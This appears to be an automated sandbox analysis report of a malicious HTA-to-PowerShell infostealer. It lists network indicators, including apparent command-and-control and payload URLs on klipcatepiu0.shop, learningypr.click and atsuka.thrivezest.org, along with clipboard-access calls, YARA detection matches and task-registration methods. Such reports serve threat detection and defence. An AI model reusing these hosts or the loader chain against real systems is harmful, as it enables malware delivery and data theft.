              Source: global trafficDNS traffic detected: DNS query: klipcatepiu0.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: learningypr.click
              Source: powershell.exe, 00000004.00000002.2190852545.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3469276083.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.3469276083.00000000050C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.2187440452.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3469276083.0000000004F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.3469276083.00000000050C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.2187440452.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3469276083.0000000004F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2187440452.0000000004F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atsuka.thri
              Source: powershell.exe, 00000006.00000002.3469276083.00000000050C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atsuka.thrivezest.org
              Source: powershell.exe, 00000006.00000002.3468681220.0000000003260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3466042158.0000000002E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsuka.thrivezest.org/hubus.xlsx
              Source: powershell.exe, 00000006.00000002.3469276083.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.3469276083.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.3469276083.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000006.00000002.3469276083.00000000050C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: powershell.exe, 00000004.00000002.2187440452.0000000005677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/
              Source: powershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/WyxI
              Source: powershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/XH
              Source: powershell.exe, 00000016.00000002.3668769118.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txt
              Source: powershell.exe, 00000016.00000002.3663856176.0000000002C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txt/537.36
              Source: powershell.exe, 00000016.00000002.3668769118.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txtEP
              Source: powershell.exe, 00000016.00000002.3671860372.00000000051D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://learningypr.clic
              Source: powershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/
              Source: powershell.exe, 00000016.00000002.3668719743.0000000002CC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.3668933189.0000000002CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/api
              Source: powershell.exe, 00000016.00000002.3668719743.0000000002CC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/api9
              Source: powershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apiHJ
              Source: powershell.exe, 00000016.00000002.3671969810.00000000051D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apics7
              Source: powershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apihK
              Source: powershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/piK
              Source: powershell.exe, 00000004.00000002.2190852545.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3469276083.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownHTTPS traffic detected: 104.21.18.182:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50007 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50008 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50009 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50010 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50011 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50012 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50014 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50015 version: TLS 1.2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00432BE0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,22_2_00432BE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00432BE0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,22_2_00432BE0

              System Summary

              barindex
              Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1428, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03080960 NtResumeThread,6_2_03080960
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03080959 NtResumeThread,6_2_03080959
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0309B8B16_2_0309B8B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0309B8C06_2_0309B8C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_031350706_2_03135070
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_031350626_2_03135062
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_031355F86_2_031355F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_031355EA6_2_031355EA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03138E706_2_03138E70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0715CF5D6_2_0715CF5D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0715CF886_2_0715CF88
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_071589566_2_07158956
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_071589606_2_07158960
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074B83206_2_074B8320
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074BC0E86_2_074BC0E8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074B2E586_2_074B2E58
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074BA3056_2_074BA305
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074BA3106_2_074BA310
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074B83156_2_074B8315
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074BC1DE6_2_074BC1DE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074BC0DB6_2_074BC0DB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C76C06_2_074C76C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C6C3F6_2_074C6C3F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C6F776_2_074C6F77
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C5F196_2_074C5F19
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C6F146_2_074C6F14
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C5FE16_2_074C5FE1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C5FF06_2_074C5FF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C7B876_2_074C7B87
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C6B816_2_074C6B81
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C6B906_2_074C6B90
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C6E646_2_074C6E64
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C6E056_2_074C6E05
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C6E2B6_2_074C6E2B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C76B16_2_074C76B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C00406_2_074C0040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C00066_2_074C0006
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C6C186_2_074C6C18
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074C70946_2_074C7094
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_086243F06_2_086243F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_086200406_2_08620040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_086210F86_2_086210F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_086211086_2_08621108
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042401022_2_00424010
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0040D0C622_2_0040D0C6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042795022_2_00427950
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043FAD022_2_0043FAD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00437B1022_2_00437B10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004223A022_2_004223A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0040AC1022_2_0040AC10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041254022_2_00412540
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00410D6422_2_00410D64
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0040E5AD22_2_0040E5AD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043774022_2_00437740
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0040871022_2_00408710
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00419F2F22_2_00419F2F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041A04322_2_0041A043
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043106022_2_00431060
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043E87022_2_0043E870
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041E80022_2_0041E800
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043608A22_2_0043608A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004090B022_2_004090B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004170B822_2_004170B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0040E15222_2_0040E152
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041990E22_2_0041990E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0040592022_2_00405920
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0040393022_2_00403930
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043713022_2_00437130
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041193422_2_00411934
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041213822_2_00412138
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004299C022_2_004299C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0040618022_2_00406180
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043298022_2_00432980
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043DA4022_2_0043DA40
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00414A0022_2_00414A00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00424A0022_2_00424A00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004042E022_2_004042E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041F2A022_2_0041F2A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041EB4022_2_0041EB40
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00424B5022_2_00424B50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043DB5022_2_0043DB50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041635B22_2_0041635B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042EB1622_2_0042EB16
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042732022_2_00427320
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043832B22_2_0043832B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042633922_2_00426339
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004073F022_2_004073F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041DB8922_2_0041DB89
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00428C6522_2_00428C65
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00422C0022_2_00422C00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00404C1022_2_00404C10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043EC2022_2_0043EC20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042D4CF22_2_0042D4CF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00427CD022_2_00427CD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043FCD022_2_0043FCD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041D4E022_2_0041D4E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00416CE022_2_00416CE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043E4E022_2_0043E4E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00427CF022_2_00427CF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004094B022_2_004094B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041F4B022_2_0041F4B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0040DD6122_2_0040DD61
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042AD7022_2_0042AD70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042E50122_2_0042E501
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043DD2022_2_0043DD20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004205D022_2_004205D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004365D622_2_004365D6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042E5D822_2_0042E5D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00405DE022_2_00405DE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042D4CA22_2_0042D4CA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041A59022_2_0041A590
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004385A022_2_004385A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043DDB022_2_0043DDB0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041BE5022_2_0041BE50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041CE7A22_2_0041CE7A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0040661022_2_00406610
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00438E1722_2_00438E17
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042E62122_2_0042E621
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042362E22_2_0042362E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041563022_2_00415630
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042E63422_2_0042E634
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00436ED022_2_00436ED0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042C6F022_2_0042C6F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004176FE22_2_004176FE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041EF5022_2_0041EF50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0042475022_2_00424750
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0040A77022_2_0040A770
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0041DF7022_2_0041DF70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004176FE22_2_004176FE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00416F0522_2_00416F05
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00445F0822_2_00445F08
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00402F2022_2_00402F20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043EFF022_2_0043EFF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043AF8022_2_0043AF80
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00429F9822_2_00429F98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00422FB022_2_00422FB0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004297B822_2_004297B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 004149F0 appears 57 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00407F80 appears 47 times
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3632
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3632Jump to behavior
              Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1428, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@9/6@3/2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00437B10 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,22_2_00437B10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Tdyjmmmaz
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03
